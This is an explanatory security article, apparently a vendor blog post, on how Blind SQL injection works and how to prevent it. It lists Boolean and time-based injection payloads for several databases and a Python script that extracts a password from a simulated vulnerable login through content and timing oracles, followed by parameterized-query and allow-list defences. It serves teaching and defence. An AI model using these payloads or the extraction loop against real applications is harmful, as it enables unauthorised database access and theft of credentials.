
How Blind SQL Injection Works

Blind SQL Injection (Blind SQLi) is the sub-type of SQL Injection (SQLi) that is more time-consuming and harder (though not impossible) to exploit. This article covers the anatomy of Blind SQLi, how to prevent SQL Injection and Blind SQLi attacks, and ways to fortify your application against them.

How Does Blind SQL Injection Work?

  • In a typical SQLi scenario, the application builds a query by concatenating unvalidated user input into SQL text and returns the query's results (or its error messages) to the client. User-controllable fields such as form parameters, URL parameters, cookies and headers are the usual injection points.
  • Using those results, the attacker crafts input strings that contain SQL code in place of the expected values.
  • The backend database interprets the attacker's input as part of the SQL command and executes it.
  • This gives the attacker access to the data, or at least to the database name, version and internal structure, which is then used to map out the schema and extract its contents.
  • In many cases, however, the application is configured not to display query results or errors for such malformed queries and instead returns a generic error message or page that gives the attacker no direct information.

This is where Blind SQL Injection comes in: attackers use it to exploit applications that return neither query results nor error details, and to exfiltrate the database anyway.

What is the Process of Blind SQLi?

If the application displays database error messages for malformed SQL queries, attackers use those messages to craft further attacks; this is termed Error-based SQLi. If a generic page or message is shown in place of the error, attackers instead infer the outcome of each injected query from indirect signals; this is termed Blind SQLi.

Using Boolean-based (content-based) and/or time-based techniques, the attacker compares the application's responses to different injected inputs to confirm that the injected syntax is accepted and evaluated. Conditional queries are then injected one after another, and the true/false outcome of each is read from those response differences, extracting the data a bit at a time.

Because Blind SQLi takes far more time and effort than classic SQLi, attackers rely on automated tools that find the injection point, fingerprint the database and drive the extraction loop, reducing the manual research and identification of SQL Injection vulnerabilities to a fraction of the time.

What Techniques are used for Blind SQLi?

1. Exploiting Blind SQL Injection by triggering conditional responses

The attacker sends a series of Boolean (TRUE or FALSE) conditions to the vulnerable application and analyzes the responses to gather information about the database. In essence, different injected conditions are meant to trigger observably different responses (a different page, a changed message, a record that appears or disappears). Typical probes:

' OR '1337'='1337'#
' OR 1337=1337 OR ''='
' OR '1337'='1337
' AND true#
' AND false#

2. Exploiting Blind SQLi by triggering time delays

If database errors are caught and handled by the application, the response to an injected query looks the same whether the injected condition is true or false, so there is no content difference to observe. The attacker instead injects a condition that, when true, makes the database pause (a sleep call, a delay statement or a heavy computation) and measures the response time to read the answer. Typical probes, with the DBMS each one targets:

' OR sleep(10)#                                             (MySQL)
' WAITFOR DELAY '0:0:10'--                                  (Microsoft SQL Server)
' OR benchmark(10000000,MD5(1))#                            (MySQL; CPU-bound delay where sleep() is unavailable)
pg_sleep(10)--                                              (PostgreSQL)
'+OR+4438=(SELECT+4438+FROM+PG_SLEEP(10))+AND+'cGPQ'='cGPQ  (PostgreSQL, URL-encoded with '+' for spaces)
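Both techniques above, the conditional responses of section 1 and the time delays of section 2, come down to the same loop: ask the database a yes/no question and read the answer from a side channel. The following Python script is an added example, not code from the original article. It builds a deliberately vulnerable login lookup on an in-memory sqlite3 database (the handler, the users table, the stored password and the emulated MySQL-style sleep() function are all constructed here for illustration), then recovers the admin password once with a content oracle and once with a timing oracle, using binary search so each character costs about seven requests rather than one per candidate character.

```python
"""Blind SQLi oracles against a simulated vulnerable login page (sqlite3, in memory).

Added example, not code from the original article. The web handler, the users
table and its contents, and the MySQL-style sleep() function registered below
are all constructed here for illustration. sqlite uses '--' for comments, so
the payloads use '--' where the MySQL payloads in the text use '#'.
"""
import sqlite3
import time

# --- Simulated vulnerable application --------------------------------------
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'S3cret!')")  # constructed data

# sqlite has no sleep(); emulate MySQL's so time-based payloads can be shown.
conn.create_function("sleep", 1, lambda seconds: time.sleep(seconds) or 0)


def vulnerable_lookup(username: str) -> str:
    """String-concatenated query (the bug). The page never shows query results
    or database errors, only one of two generic messages."""
    sql = f"SELECT id FROM users WHERE username = '{username}'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "Something went wrong"  # generic error page, no details leak
    return "Welcome back" if row else "Unknown user"


# --- Attacker side -----------------------------------------------------------
# SQL expression whose string value we want to recover without ever seeing it.
SECRET_EXPR = "(SELECT password FROM users WHERE username = 'admin')"


def boolean_oracle(condition: str) -> bool:
    """Content-based: a true condition keeps the admin row, a false one drops it,
    and the two cases produce different page text."""
    payload = f"admin' AND ({condition})--"
    return vulnerable_lookup(payload) == "Welcome back"


def time_oracle(condition: str, delay: float = 0.05, threshold: float = 0.025) -> bool:
    """Time-based: page text is identical either way; only a true condition
    makes the database sleep, and the attacker measures the round trip."""
    payload = f"' OR (CASE WHEN ({condition}) THEN sleep({delay}) ELSE 0 END)--"
    start = time.monotonic()
    vulnerable_lookup(payload)
    return time.monotonic() - start >= threshold


def extract(oracle, expr: str, max_len: int = 64) -> str:
    """Recover the string value of SQL expression `expr` using only yes/no
    answers. Binary search over the length, then over the code point of each
    character, so each character costs about seven questions instead of up to 95."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo

    chars = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


if __name__ == "__main__":
    print("boolean-based:", extract(boolean_oracle, SECRET_EXPR))
    print("time-based:   ", extract(time_oracle, SECRET_EXPR))
```

The two oracles differ only in how the answer is read; the extraction loop is the same, which is why the automated tools mentioned above can switch techniques per target. Note that the timing oracle needs a threshold comfortably above the normal round trip, and that on a noisy network the attacker must use longer delays or repeat each measurement, which is what makes time-based extraction the slowest variant.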

How to Prevent SQL Injection Attacks?

Though SQLi and Blind SQLi are orchestrated with different methods and tools, the techniques for preventing both are the same.

Secure Coding Practices

  • Secure coding practices in line with the OWASP secure coding guidelines must be followed, regardless of the language and web development platform in use.
  • Legacy code must be migrated to current libraries and data-access APIs that support parameterized queries.
  • Parameterized queries (prepared statements with bound variables) must be used instead of dynamically concatenated SQL; any remaining dynamic SQL must be converted. Bind parameters can only carry values, so table names, column names or ORDER BY targets that come from user input must instead be checked against an allow-list of known identifiers.
  • Stored procedures can also help, provided the procedure itself does not build dynamic SQL from its arguments; a stored procedure that concatenates its parameters into a query is just as injectable as the application code it replaced.

Strong Input Validation

  • All user input must be validated against what the application actually expects, so that unexpected characters or content are rejected before they reach a query.
  • Define an allow-list of permitted characters or patterns for each input field and reject everything else; a block-list of "dangerous" characters is easy to bypass.
  • Where a value must be placed into a query position that cannot be parameterized, escape it with the database driver's own escaping routine rather than a hand-written one. Validation and escaping are defence in depth; parameterized queries remain the primary control.
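The Secure Coding Practices and Strong Input Validation points above are shown together in the following Python example, which is added here and is not code from the original article. It puts the dynamic query beside its parameterized replacement, feeds both the same Boolean payload from earlier in the article, and adds allow-list validation in front of the parameterized query plus an allow-list of column names for an ORDER BY clause that cannot take a bind parameter. The users table, its rows, the username policy and the sortable-column set are all constructed here for illustration.

```python
"""Dynamic SQL beside its parameterized replacement, plus allow-list validation (sqlite3).

Added example, not code from the original article. The users table, its rows,
the username policy and the sortable-column list are constructed here for
illustration.
"""
import re
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
conn.executemany("INSERT INTO users (username) VALUES (?)", [("admin",), ("alice",)])  # constructed


def lookup_dynamic(username: str) -> list:
    """BEFORE: the value is spliced into the SQL text, so a quote in the input
    ends the string literal and the rest of the input is parsed as SQL."""
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(username: str) -> list:
    """AFTER: the SQL text is fixed before any input arrives; the driver passes
    the value as data, so it can only ever be compared, never parsed."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


# Allow-list validation: state what a valid value looks like and reject the rest.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")  # policy assumed for this example


def is_valid_username(username: str) -> bool:
    return USERNAME_RE.fullmatch(username) is not None


def lookup_hardened(username: str) -> list:
    """Validation in front of the parameterized query: defence in depth, not a
    substitute for it. Rejected input never reaches the database at all."""
    if not is_valid_username(username):
        raise ValueError("invalid username")
    return lookup_parameterized(username)


# Identifiers (here, the ORDER BY column) cannot be bind parameters, so the
# only safe option is an allow-list of known column names.
SORTABLE_COLUMNS = {"id", "username"}


def list_users(order_by: str) -> list:
    if order_by not in SORTABLE_COLUMNS:
        raise ValueError("invalid sort column")
    return [row[0] for row in conn.execute(f"SELECT username FROM users ORDER BY {order_by}")]


if __name__ == "__main__":
    payload = "' OR '1337'='1337"
    print("dynamic:      ", lookup_dynamic(payload))        # every row comes back
    print("parameterized:", lookup_parameterized(payload))  # compared literally: no match
    print("valid input?  ", is_valid_username(payload))
```

Run against the payload, the dynamic query returns every user while the parameterized one returns nothing, because the driver compares the whole string, quotes included, against the username column. The validator rejects the payload outright, but notice that the parameterized query was already safe without it; validation mainly protects positions such as the ORDER BY identifier that parameterization cannot cover.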

Other Measures

  • Encrypt sensitive data at rest. Application-level encryption of sensitive columns limits what an injected query can read; transparent disk or tablespace encryption alone does not, because the database decrypts it for any query the application account runs.
  • Minimal privileges: run the application with a database account that has only the permissions it needs (no DDL, no file read/write, no access to other schemas), so a successful injection is confined to that account's rights.
  • Strict access control to the database server itself (network restrictions, no direct exposure to the internet, separate accounts per application).

Continuous, Intelligent and Effective Scanning

A comprehensive and intelligent scanning tool must be used for regular and on-demand scanning of the web application, starting in the early stages of the SDLC, to identify vulnerabilities and security misconfigurations continuously and effectively.

Fortify Web Application Security

To fortify web application security, scanning must be part of a robust, holistic, managed security solution like AppTrana that includes an always-on WAF, pen-testing, regular security audits, and the expert services of certified security professionals.

Conclusion

Does simply hiding the error messages stop Blind SQLi attacks from happening?
No.
It makes the attack slower and harder for the attacker but does not prevent SQL injection from occurring. With newer and more sophisticated ways to orchestrate Blind SQL Injection attacks being developed continuously, are you equipped to secure your application against them?

Ritika Singh

This post was last modified on January 2, 2024 17:32
